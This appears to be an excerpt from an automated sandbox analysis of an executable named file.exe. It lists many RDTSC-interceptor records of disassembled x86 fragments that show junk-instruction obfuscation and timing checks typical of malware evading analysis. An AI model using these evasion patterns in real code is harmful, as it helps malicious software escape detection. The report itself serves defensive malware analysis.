Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7550 second address: 9F7554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F65A1 second address: 9F65A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F66F5 second address: 9F670B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2D810C1E5Bh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F670B second address: 9F6712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6830 second address: 9F6834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6834 second address: 9F6838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6838 second address: 9F683E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F683E second address: 9F6844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6844 second address: 9F684E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2D810C1E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F684E second address: 9F6867 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F2D807904AAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F69B4 second address: 9F69B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F69B9 second address: 9F69E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F2D807904BAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F2D807904AAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F69E6 second address: 9F69F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D810C1E5Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8B09 second address: 9F8B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8B0D second address: 9F8B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D810C1E62h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8B29 second address: 9F8B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8B2D second address: 9F8B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB6E6 second address: 9FB6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB799 second address: 9FB7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 popad 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F2D810C1E58h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edx, ebx 0x00000026 push 00000004h 0x00000028 mov dword ptr [ebp+12447CFAh], ecx 0x0000002e call 00007F2D810C1E59h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jng 00007F2D810C1E56h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB7DE second address: 9FB7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB7E2 second address: 9FB7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB7E8 second address: 9FB817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2D807904A6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push ecx 0x00000015 jmp 00007F2D807904AFh 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB817 second address: 9FB81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB81B second address: 9FB82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB82A second address: 9FB82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB82E second address: 9FB832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB832 second address: 9FB838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB838 second address: 9FB83D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB83D second address: 9FB870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F2D810C1E65h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB870 second address: 9FB882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D807904AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB882 second address: 9FB886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBA2B second address: 9FBA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2D807904A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD140 second address: 9FD148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD148 second address: 9FD14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FCD04 second address: 9FCD11 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FEB78 second address: 9FEB82 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2D807904A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03D6 second address: 4AB03DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03DC second address: 4AB03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03E0 second address: 4AB03FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2D810C1E63h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB03FE second address: 4AB0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0404 second address: 4AB0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0408 second address: 4AB0430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c call 00007F2D807904ADh 0x00000011 pop edi 0x00000012 mov esi, 1E2AB253h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0430 second address: 4AB0434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0434 second address: 4AB043A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB043A second address: 4AB044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 mov dx, 7BD8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB04F7 second address: 4AB04FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB04FC second address: 4AB0502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0502 second address: 4AB0506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0506 second address: 4AB053C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F2D810C1E59h 0x0000000d jmp 00007F2D810C1E5Ah 0x00000012 push eax 0x00000013 jmp 00007F2D810C1E5Bh 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 mov ecx, 0BFC6AD7h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB053C second address: 4AB0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F2D807904B9h 0x0000000b add al, FFFFFFB6h 0x0000000e jmp 00007F2D807904B1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov edi, 76D6EAF2h 0x0000001f movsx edi, cx 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 mov edx, 53131D16h 0x0000002d mov ebx, 789BF4A2h 0x00000032 popad 0x00000033 pop eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0596 second address: 4AB059A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB059A second address: 4AB059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB059E second address: 4AB05A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB05A4 second address: 4AB0617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F2DF1F13EE3h 0x0000000e push 762327D0h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [762C0140h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 jmp 00007F2D807904AEh 0x00000058 and dword ptr [ebp-04h], 00000000h 0x0000005c pushad 0x0000005d mov bx, ax 0x00000060 jmp 00007F2D807904AAh 0x00000065 popad 0x00000066 mov edx, dword ptr [ebp+0Ch] 0x00000069 pushad 0x0000006a pushfd 0x0000006b jmp 00007F2D807904AEh 0x00000070 or ecx, 6722D2C8h 0x00000076 jmp 00007F2D807904ABh 0x0000007b popfd 0x0000007c push esi 0x0000007d mov si, di 0x00000080 pop edx 0x00000081 popad 0x00000082 mov esi, edx 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F2D807904ADh 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0617 second address: 4AB068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov al, byte ptr [edx] 0x0000000c jmp 00007F2D810C1E5Fh 0x00000011 inc edx 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 pushfd 0x00000017 jmp 00007F2D810C1E61h 0x0000001c sub cx, C3F6h 0x00000021 jmp 00007F2D810C1E61h 0x00000026 popfd 0x00000027 popad 0x00000028 test al, al 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov cl, bh 0x0000002f pushfd 0x00000030 jmp 00007F2D810C1E64h 0x00000035 sub ah, 00000048h 0x00000038 jmp 00007F2D810C1E5Bh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB068D second address: 4AB068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6E98C5EAh 0x00000008 mov esi, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F2D80790427h 0x00000013 mov al, byte ptr [edx] 0x00000015 jmp 00007F2D807904AFh 0x0000001a inc edx 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f pushfd 0x00000020 jmp 00007F2D807904B1h 0x00000025 sub cx, C3F6h 0x0000002a jmp 00007F2D807904B1h 0x0000002f popfd 0x00000030 popad 0x00000031 test al, al 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cl, bh 0x00000038 pushfd 0x00000039 jmp 00007F2D807904B4h 0x0000003e sub ah, 00000048h 0x00000041 jmp 00007F2D807904ABh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0727 second address: 4AB0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2D810C1E61h 0x00000009 xor ch, FFFFFFE6h 0x0000000c jmp 00007F2D810C1E61h 0x00000011 popfd 0x00000012 mov eax, 18382D17h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edi, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0762 second address: 4AB0766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0766 second address: 4AB076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB076C second address: 4AB07A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2D807904ACh 0x00000009 add cx, F5B8h 0x0000000e jmp 00007F2D807904ABh 0x00000013 popfd 0x00000014 mov ah, 59h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 dec edi 0x0000001a jmp 00007F2D807904ABh 0x0000001f lea ebx, dword ptr [edi+01h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov si, 7A71h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB07A8 second address: 4AB081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Dh 0x00000009 popad 0x0000000a mov al, byte ptr [edi+01h] 0x0000000d jmp 00007F2D810C1E5Eh 0x00000012 inc edi 0x00000013 jmp 00007F2D810C1E60h 0x00000018 test al, al 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F2D810C1E5Eh 0x00000021 add ax, 34D8h 0x00000026 jmp 00007F2D810C1E5Bh 0x0000002b popfd 0x0000002c mov di, cx 0x0000002f popad 0x00000030 jne 00007F2DF283A0D2h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F2D810C1E61h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB081C second address: 4AB0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0821 second address: 4AB0880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F2D810C1E5Dh 0x0000000a and cx, E726h 0x0000000f jmp 00007F2D810C1E61h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ecx, edx 0x0000001a pushad 0x0000001b movsx edx, cx 0x0000001e popad 0x0000001f shr ecx, 02h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F2D810C1E60h 0x00000029 or cx, A3F8h 0x0000002e jmp 00007F2D810C1E5Bh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 mov cx, ACC5h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0880 second address: 4AB08DC instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 rep movsd 0x0000000a rep movsd 0x0000000c rep movsd 0x0000000e rep movsd 0x00000010 rep movsd 0x00000012 pushad 0x00000013 mov eax, 27E2C679h 0x00000018 pushfd 0x00000019 jmp 00007F2D807904B6h 0x0000001e or cx, 2D88h 0x00000023 jmp 00007F2D807904ABh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ecx, edx 0x0000002c jmp 00007F2D807904B6h 0x00000031 and ecx, 03h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov esi, ebx 0x00000039 mov bh, 50h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB08DC second address: 4AB08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D810C1E5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB08EE second address: 4AB0995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rep movsb 0x0000000a jmp 00007F2D807904B7h 0x0000000f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2D807904B4h 0x0000001d xor ch, FFFFFFD8h 0x00000020 jmp 00007F2D807904ABh 0x00000025 popfd 0x00000026 popad 0x00000027 mov eax, ebx 0x00000029 jmp 00007F2D807904B5h 0x0000002e mov ecx, dword ptr [ebp-10h] 0x00000031 pushad 0x00000032 mov ecx, 69EDE613h 0x00000037 jmp 00007F2D807904B8h 0x0000003c popad 0x0000003d mov dword ptr fs:[00000000h], ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F2D807904B7h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0995 second address: 4AB09ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3829096Ah 0x00000008 call 00007F2D810C1E5Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 jmp 00007F2D810C1E5Fh 0x00000017 pop edi 0x00000018 jmp 00007F2D810C1E66h 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F2D810C1E67h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB09ED second address: 4AB04F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2D807904AFh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007F2D807904B0h 0x00000013 pushfd 0x00000014 jmp 00007F2D807904B2h 0x00000019 or ecx, 4C444078h 0x0000001f jmp 00007F2D807904ABh 0x00000024 popfd 0x00000025 popad 0x00000026 leave 0x00000027 jmp 00007F2D807904B6h 0x0000002c retn 0008h 0x0000002f cmp dword ptr [ebp-2Ch], 10h 0x00000033 mov eax, dword ptr [ebp-40h] 0x00000036 jnc 00007F2D807904A5h 0x00000038 push eax 0x00000039 lea edx, dword ptr [ebp-00000590h] 0x0000003f push edx 0x00000040 call esi 0x00000042 push 00000008h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push ebx 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0B44 second address: 4AB0BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007F2D810C1E60h 0x0000000c add ecx, 24D05378h 0x00000012 jmp 00007F2D810C1E5Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov esi, edx 0x00000021 pushfd 0x00000022 jmp 00007F2D810C1E67h 0x00000027 and si, 0FEEh 0x0000002c jmp 00007F2D810C1E69h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0BAE second address: 4AB0BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0BB4 second address: 4AB0BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0BB8 second address: 4AB0BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F2D807904ABh 0x00000011 pop esi 0x00000012 mov di, 47ACh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0BD5 second address: 4AB0C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2D810C1E60h 0x00000008 pop esi 0x00000009 mov ebx, 3D541186h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2D810C1E68h 0x00000019 rdtsc
